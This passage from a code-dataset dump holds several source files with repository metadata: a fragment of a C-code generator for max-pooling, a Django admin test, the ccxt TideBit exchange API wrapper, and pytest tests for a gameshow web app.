npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// handle the case where no padding, ignore border is True
if (%(params)s->ignore_border)
{
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
}
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, params=sub['params'], non_pool_ndim=non_pool_ndim)
ccode += """
// get a pointer to the correct position in the output
dtype_%(z)s * z;
if (%(total_ndim)s == 4)
z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s, o_idx[0], o_idx[1], o_idx[2], o_idx[3])));
else
z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s, o_idx)));
"""
for i in xrange(nd):
ccode += """
// set the first index of dimension %(i)s
i_idx[%(non_pool_ndim)s + %(i)s] = r_st[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// use the first element as the initial value of collector
if (%(total_ndim)s == 4) {
collector = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
eval_collector = ((dtype_%(ex)s*)(PyArray_GETPTR4(%(ex)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
} else {
collector = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
eval_collector = ((dtype_%(ex)s*)(PyArray_GetPtr(%(ex)s,i_idx)))[0];
}
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update maximum
dtype_%(x)s a;
dtype_%(ex)s ea;
if (%(total_ndim)s == 4) {
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
ea = ((dtype_%(ex)s*)(PyArray_GETPTR4(%(ex)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
}
else {
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
ea = ((dtype_%(ex)s*)(PyArray_GetPtr(%(ex)s,i_idx)))[0];
}
if (a > collector) {
collector = a;
eval_collector = ea;
}
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
ccode += """
z[0] = eval_collector;
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
def c_code_cache_version(self):
return (1, self.openmp)
| true | true |
f7104a1e09cb5f5864d25354d11d833d0bfc4a7e | 1,306 | py | Python | app/core/tests/test_admin.py | rodnaskorn/recipe-app-api | a3d16d77ef51ea39d9ac433772de99f29e2fc1cd | [
"MIT"
] | null | null | null | app/core/tests/test_admin.py | rodnaskorn/recipe-app-api | a3d16d77ef51ea39d9ac433772de99f29e2fc1cd | [
"MIT"
] | null | null | null | app/core/tests/test_admin.py | rodnaskorn/recipe-app-api | a3d16d77ef51ea39d9ac433772de99f29e2fc1cd | [
"MIT"
] | null | null | null | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email='admin@test.com',
password='password123'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email='test@test.com',
password='password123',
name='John Smith'
)
def test_users_listed(self):
"""Test that users are listed on user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 31.095238 | 68 | 0.637825 | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email='admin@test.com',
password='password123'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email='test@test.com',
password='password123',
name='John Smith'
)
def test_users_listed(self):
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| true | true |
f7104a21aebf2e2aa07cc55c113bdba2ce69ca83 | 16,448 | py | Python | python/ccxt/tidebit.py | xeddmc/ccxt | 9ddd88e6bbc4b2162cf45d331995bb86235d2a59 | [
"MIT"
] | 1 | 2021-03-01T17:45:33.000Z | 2021-03-01T17:45:33.000Z | python/ccxt/tidebit.py | xeddmc/ccxt | 9ddd88e6bbc4b2162cf45d331995bb86235d2a59 | [
"MIT"
] | 4 | 2020-09-06T22:46:57.000Z | 2021-05-10T08:35:02.000Z | python/ccxt/tidebit.py | xeddmc/ccxt | 9ddd88e6bbc4b2162cf45d331995bb86235d2a59 | [
"MIT"
] | 1 | 2019-11-08T12:36:13.000Z | 2019-11-08T12:36:13.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import OrderNotFound
class tidebit (Exchange):
def describe(self):
return self.deep_extend(super(tidebit, self).describe(), {
'id': 'tidebit',
'name': 'TideBit',
'countries': ['HK'],
'rateLimit': 1000,
'version': 'v2',
'has': {
'fetchDepositAddress': True,
'CORS': True,
'fetchTickers': True,
'fetchOHLCV': True,
'withdraw': True,
},
'timeframes': {
'1m': '1',
'5m': '5',
'15m': '15',
'30m': '30',
'1h': '60',
'2h': '120',
'4h': '240',
'12h': '720',
'1d': '1440',
'3d': '4320',
'1w': '10080',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/39034921-e3acf016-4480-11e8-9945-a6086a1082fe.jpg',
'api': 'https://www.tidebit.com',
'www': 'https://www.tidebit.com',
'doc': [
'https://www.tidebit.com/documents/api/guide',
'https://www.tidebit.com/swagger/#/default',
],
'referral': 'http://bit.ly/2IX0LrM',
},
'api': {
'public': {
'get': [
'markets',
'tickers',
'tickers/{market}',
'timestamp',
'trades',
'trades/{market}',
'order_book',
'order',
'k_with_pending_trades',
'k',
'depth',
],
'post': [],
},
'private': {
'get': [
'addresses/{address}',
'deposits/history',
'deposits/get_deposit',
'deposits/deposit_address',
'historys/orders',
'historys/vouchers',
'historys/accounts',
'historys/snapshots',
'linkage/get_status',
'members/me',
'order',
'orders',
'partners/orders/{id}/trades',
'referral_commissions/get_undeposited',
'referral_commissions/get_graph_data',
'trades/my',
'withdraws/bind_account_list',
'withdraws/get_withdraw_account',
'withdraws/fetch_bind_info',
],
'post': [
'deposits/deposit_cash',
'favorite_markets/update',
'order/delete',
'orders',
'orders/multi',
'orders/clear',
'referral_commissions/deposit',
'withdraws/apply',
'withdraws/bind_bank',
'withdraws/bind_address',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.2 / 100,
'taker': 0.2 / 100,
},
'funding': {
'tierBased': False,
'percentage': True,
'withdraw': {}, # There is only 1% fee on withdrawals to your bank account.
},
},
'exceptions': {
'2002': InsufficientFunds,
'2003': OrderNotFound,
},
})
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateGetDepositAddress(self.extend(request, params))
if 'success' in response:
if response['success']:
address = self.safe_string(response, 'address')
tag = self.safe_string(response, 'addressTag')
return {
'currency': code,
'address': self.check_address(address),
'tag': tag,
'info': response,
}
def fetch_markets(self, params={}):
response = self.publicGetMarkets(params)
result = []
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'id')
symbol = self.safe_string(market, 'name')
baseId, quoteId = symbol.split('/')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetMembersMe(params)
balances = self.safe_value(response, 'accounts')
result = {'info': balances}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_float(balance, 'balance')
account['used'] = self.safe_float(balance, 'locked')
result[code] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
if limit is not None:
request['limit'] = limit # default = 300
request['market'] = market['id']
response = self.publicGetDepth(self.extend(request, params))
timestamp = self.safe_timestamp(response, 'timestamp')
return self.parse_order_book(response, timestamp)
def parse_ticker(self, ticker, market=None):
timestamp = self.safe_timestamp(ticker, 'at')
ticker = self.safe_value(ticker, 'ticker', {})
symbol = None
if market is not None:
symbol = market['symbol']
last = self.safe_float(ticker, 'last')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': self.safe_float(ticker, 'buy'),
'ask': self.safe_float(ticker, 'sell'),
'bidVolume': None,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'change': None,
'percentage': None,
'previousClose': None,
'average': None,
'baseVolume': self.safe_float(ticker, 'vol'),
'quoteVolume': None,
'info': ticker,
}
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
tickers = self.publicGetTickers(params)
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
id = ids[i]
market = None
symbol = id
if id in self.markets_by_id:
market = self.markets_by_id[id]
symbol = market['symbol']
else:
baseId = id[0:3]
quoteId = id[3:6]
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
response = self.publicGetTickersMarket(self.extend(request, params))
return self.parse_ticker(response, market)
def parse_trade(self, trade, market=None):
timestamp = self.parse8601(self.safe_string(trade, 'created_at'))
id = self.safe_string(trade, 'id')
price = self.safe_float(trade, 'price')
amount = self.safe_float(trade, 'volume')
cost = self.safe_float(trade, 'funds')
symbol = None
if market is not None:
symbol = market['symbol']
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': None,
'order': None,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
response = self.publicGetTrades(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1m', since=None, limit=None):
return [
ohlcv[0] * 1000,
ohlcv[1],
ohlcv[2],
ohlcv[3],
ohlcv[4],
ohlcv[5],
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
if limit is None:
limit = 30 # default is 30
request = {
'market': market['id'],
'period': self.timeframes[timeframe],
'limit': limit,
}
if since is not None:
request['timestamp'] = int(since / 1000)
else:
request['timestamp'] = 1800000
response = self.publicGetK(self.extend(request, params))
if response == 'null':
return []
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'done': 'closed',
'wait': 'open',
'cancel': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
symbol = None
if market is not None:
symbol = market['symbol']
else:
marketId = order['market']
symbol = self.markets_by_id[marketId]['symbol']
timestamp = self.parse8601(self.safe_string(order, 'created_at'))
status = self.parse_order_status(self.safe_string(order, 'state'))
id = self.safe_string(order, 'id')
type = self.safe_string(order, 'ord_type')
side = self.safe_string(order, 'side')
price = self.safe_float(order, 'price')
amount = self.safe_float(order, 'volume')
filled = self.safe_float(order, 'executed_volume')
remaining = self.safe_float(order, 'remaining_volume')
cost = None
if price is not None:
if filled is not None:
cost = price * filled
return {
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': type,
'side': side,
'price': price,
'amount': amount,
'filled': filled,
'remaining': remaining,
'cost': cost,
'trades': None,
'fee': None,
'info': order,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
request = {
'market': self.market_id(symbol),
'side': side,
'volume': str(amount),
'ord_type': type,
}
if type == 'limit':
request['price'] = str(price)
response = self.privatePostOrders(self.extend(request, params))
market = self.markets_by_id[response['market']]
return self.parse_order(response, market)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'id': id,
}
result = self.privatePostOrderDelete(self.extend(request, params))
order = self.parse_order(result)
status = self.safe_string(order, 'status')
if status == 'closed' or status == 'canceled':
raise OrderNotFound(self.id + ' ' + self.json(order))
return order
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
id = self.safe_string(params, 'id')
if id is None:
raise ExchangeError(self.id + ' withdraw() requires an extra `id` param(withdraw account id according to withdraws/bind_account_list endpoint')
request = {
'id': id,
'currency_type': 'coin', # or 'cash'
'currency': currency['id'],
'body': amount,
# 'address': address, # they don't allow withdrawing to direct addresses?
}
if tag is not None:
request['memo'] = tag
result = self.privatePostWithdrawsApply(self.extend(request, params))
return {
'info': result,
'id': None,
}
def nonce(self):
return self.milliseconds()
def encode_params(self, params):
return self.urlencode(self.keysort(params))
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
request = '/' + 'api/' + self.version + '/' + self.implode_params(path, params) + '.json'
query = self.omit(params, self.extract_params(path))
url = self.urls['api'] + request
if api == 'public':
if query:
url += '?' + self.urlencode(query)
else:
self.check_required_credentials()
nonce = str(self.nonce())
sortedByKey = self.keysort(self.extend({
'access_key': self.apiKey,
'tonce': nonce,
}, params))
query = self.urlencode(sortedByKey)
payload = method + '|' + request + '|' + query
signature = self.hmac(self.encode(payload), self.encode(self.secret))
suffix = query + '&signature=' + signature
if method == 'GET':
url += '?' + suffix
else:
body = suffix
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response):
if code == 400:
error = self.safe_value(response, 'error')
errorCode = self.safe_string(error, 'code')
feedback = self.id + ' ' + self.json(response)
exceptions = self.exceptions
if errorCode in exceptions:
raise exceptions[errorCode](feedback)
# fallback to default error handler
| 36.632517 | 155 | 0.486685 |
ge import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import OrderNotFound
class tidebit (Exchange):
def describe(self):
return self.deep_extend(super(tidebit, self).describe(), {
'id': 'tidebit',
'name': 'TideBit',
'countries': ['HK'],
'rateLimit': 1000,
'version': 'v2',
'has': {
'fetchDepositAddress': True,
'CORS': True,
'fetchTickers': True,
'fetchOHLCV': True,
'withdraw': True,
},
'timeframes': {
'1m': '1',
'5m': '5',
'15m': '15',
'30m': '30',
'1h': '60',
'2h': '120',
'4h': '240',
'12h': '720',
'1d': '1440',
'3d': '4320',
'1w': '10080',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/39034921-e3acf016-4480-11e8-9945-a6086a1082fe.jpg',
'api': 'https://www.tidebit.com',
'www': 'https://www.tidebit.com',
'doc': [
'https://www.tidebit.com/documents/api/guide',
'https://www.tidebit.com/swagger/#/default',
],
'referral': 'http://bit.ly/2IX0LrM',
},
'api': {
'public': {
'get': [
'markets',
'tickers',
'tickers/{market}',
'timestamp',
'trades',
'trades/{market}',
'order_book',
'order',
'k_with_pending_trades',
'k',
'depth',
],
'post': [],
},
'private': {
'get': [
'addresses/{address}',
'deposits/history',
'deposits/get_deposit',
'deposits/deposit_address',
'historys/orders',
'historys/vouchers',
'historys/accounts',
'historys/snapshots',
'linkage/get_status',
'members/me',
'order',
'orders',
'partners/orders/{id}/trades',
'referral_commissions/get_undeposited',
'referral_commissions/get_graph_data',
'trades/my',
'withdraws/bind_account_list',
'withdraws/get_withdraw_account',
'withdraws/fetch_bind_info',
],
'post': [
'deposits/deposit_cash',
'favorite_markets/update',
'order/delete',
'orders',
'orders/multi',
'orders/clear',
'referral_commissions/deposit',
'withdraws/apply',
'withdraws/bind_bank',
'withdraws/bind_address',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.2 / 100,
'taker': 0.2 / 100,
},
'funding': {
'tierBased': False,
'percentage': True,
'withdraw': {},
},
},
'exceptions': {
'2002': InsufficientFunds,
'2003': OrderNotFound,
},
})
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateGetDepositAddress(self.extend(request, params))
if 'success' in response:
if response['success']:
address = self.safe_string(response, 'address')
tag = self.safe_string(response, 'addressTag')
return {
'currency': code,
'address': self.check_address(address),
'tag': tag,
'info': response,
}
def fetch_markets(self, params={}):
response = self.publicGetMarkets(params)
result = []
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'id')
symbol = self.safe_string(market, 'name')
baseId, quoteId = symbol.split('/')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetMembersMe(params)
balances = self.safe_value(response, 'accounts')
result = {'info': balances}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_float(balance, 'balance')
account['used'] = self.safe_float(balance, 'locked')
result[code] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
if limit is not None:
request['limit'] = limit
request['market'] = market['id']
response = self.publicGetDepth(self.extend(request, params))
timestamp = self.safe_timestamp(response, 'timestamp')
return self.parse_order_book(response, timestamp)
def parse_ticker(self, ticker, market=None):
timestamp = self.safe_timestamp(ticker, 'at')
ticker = self.safe_value(ticker, 'ticker', {})
symbol = None
if market is not None:
symbol = market['symbol']
last = self.safe_float(ticker, 'last')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': self.safe_float(ticker, 'buy'),
'ask': self.safe_float(ticker, 'sell'),
'bidVolume': None,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'change': None,
'percentage': None,
'previousClose': None,
'average': None,
'baseVolume': self.safe_float(ticker, 'vol'),
'quoteVolume': None,
'info': ticker,
}
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
tickers = self.publicGetTickers(params)
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
id = ids[i]
market = None
symbol = id
if id in self.markets_by_id:
market = self.markets_by_id[id]
symbol = market['symbol']
else:
baseId = id[0:3]
quoteId = id[3:6]
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
response = self.publicGetTickersMarket(self.extend(request, params))
return self.parse_ticker(response, market)
def parse_trade(self, trade, market=None):
timestamp = self.parse8601(self.safe_string(trade, 'created_at'))
id = self.safe_string(trade, 'id')
price = self.safe_float(trade, 'price')
amount = self.safe_float(trade, 'volume')
cost = self.safe_float(trade, 'funds')
symbol = None
if market is not None:
symbol = market['symbol']
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': None,
'order': None,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
response = self.publicGetTrades(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1m', since=None, limit=None):
return [
ohlcv[0] * 1000,
ohlcv[1],
ohlcv[2],
ohlcv[3],
ohlcv[4],
ohlcv[5],
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
if limit is None:
limit = 30
request = {
'market': market['id'],
'period': self.timeframes[timeframe],
'limit': limit,
}
if since is not None:
request['timestamp'] = int(since / 1000)
else:
request['timestamp'] = 1800000
response = self.publicGetK(self.extend(request, params))
if response == 'null':
return []
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'done': 'closed',
'wait': 'open',
'cancel': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
symbol = None
if market is not None:
symbol = market['symbol']
else:
marketId = order['market']
symbol = self.markets_by_id[marketId]['symbol']
timestamp = self.parse8601(self.safe_string(order, 'created_at'))
status = self.parse_order_status(self.safe_string(order, 'state'))
id = self.safe_string(order, 'id')
type = self.safe_string(order, 'ord_type')
side = self.safe_string(order, 'side')
price = self.safe_float(order, 'price')
amount = self.safe_float(order, 'volume')
filled = self.safe_float(order, 'executed_volume')
remaining = self.safe_float(order, 'remaining_volume')
cost = None
if price is not None:
if filled is not None:
cost = price * filled
return {
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': type,
'side': side,
'price': price,
'amount': amount,
'filled': filled,
'remaining': remaining,
'cost': cost,
'trades': None,
'fee': None,
'info': order,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
request = {
'market': self.market_id(symbol),
'side': side,
'volume': str(amount),
'ord_type': type,
}
if type == 'limit':
request['price'] = str(price)
response = self.privatePostOrders(self.extend(request, params))
market = self.markets_by_id[response['market']]
return self.parse_order(response, market)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'id': id,
}
result = self.privatePostOrderDelete(self.extend(request, params))
order = self.parse_order(result)
status = self.safe_string(order, 'status')
if status == 'closed' or status == 'canceled':
raise OrderNotFound(self.id + ' ' + self.json(order))
return order
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
id = self.safe_string(params, 'id')
if id is None:
raise ExchangeError(self.id + ' withdraw() requires an extra `id` param(withdraw account id according to withdraws/bind_account_list endpoint')
request = {
'id': id,
'currency_type': 'coin',
'currency': currency['id'],
'body': amount,
request['memo'] = tag
result = self.privatePostWithdrawsApply(self.extend(request, params))
return {
'info': result,
'id': None,
}
def nonce(self):
return self.milliseconds()
def encode_params(self, params):
return self.urlencode(self.keysort(params))
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
request = '/' + 'api/' + self.version + '/' + self.implode_params(path, params) + '.json'
query = self.omit(params, self.extract_params(path))
url = self.urls['api'] + request
if api == 'public':
if query:
url += '?' + self.urlencode(query)
else:
self.check_required_credentials()
nonce = str(self.nonce())
sortedByKey = self.keysort(self.extend({
'access_key': self.apiKey,
'tonce': nonce,
}, params))
query = self.urlencode(sortedByKey)
payload = method + '|' + request + '|' + query
signature = self.hmac(self.encode(payload), self.encode(self.secret))
suffix = query + '&signature=' + signature
if method == 'GET':
url += '?' + suffix
else:
body = suffix
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response):
if code == 400:
error = self.safe_value(response, 'error')
errorCode = self.safe_string(error, 'code')
feedback = self.id + ' ' + self.json(response)
exceptions = self.exceptions
if errorCode in exceptions:
raise exceptions[errorCode](feedback)
# fallback to default error handler
| true | true |
f7104af5717a6011d196d1dc4179149301442dfe | 803 | py | Python | tests/test_gameshow.py | AndrewWasHere/gameshow | 70441bff391f7313a1e186f68ee9df7df83c90fa | [
"BSD-3-Clause"
] | null | null | null | tests/test_gameshow.py | AndrewWasHere/gameshow | 70441bff391f7313a1e186f68ee9df7df83c90fa | [
"BSD-3-Clause"
] | null | null | null | tests/test_gameshow.py | AndrewWasHere/gameshow | 70441bff391f7313a1e186f68ee9df7df83c90fa | [
"BSD-3-Clause"
] | null | null | null | """
Copyright 2016, Andrew Lin
All rights reserved.
This software is licensed under the BSD 3-Clause License.
See LICENSE.txt at the root of the project or
https://opensource.org/licenses/BSD-3-Clause
"""
import pytest
from app.gameshow import make_gameshow
@pytest.fixture
def app():
"""The whole gameshow app."""
a = make_gameshow()
return a.test_client()
def test_scoreboard(app):
"""Test / endpoint."""
response = app.get('/')
assert response.status_code == 200
assert response.content_type.startswith('text/html')
def test_proctor(app):
"""Test /proctor endpoint."""
response = app.get('/proctor')
assert response.status_code == 200
assert response.content_type.startswith('text/html')
def test_players(app):
"""Test /players endpoint.""" | 21.131579 | 57 | 0.697385 | import pytest
from app.gameshow import make_gameshow
@pytest.fixture
def app():
a = make_gameshow()
return a.test_client()
def test_scoreboard(app):
response = app.get('/')
assert response.status_code == 200
assert response.content_type.startswith('text/html')
def test_proctor(app):
response = app.get('/proctor')
assert response.status_code == 200
assert response.content_type.startswith('text/html')
def test_players(app): | true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.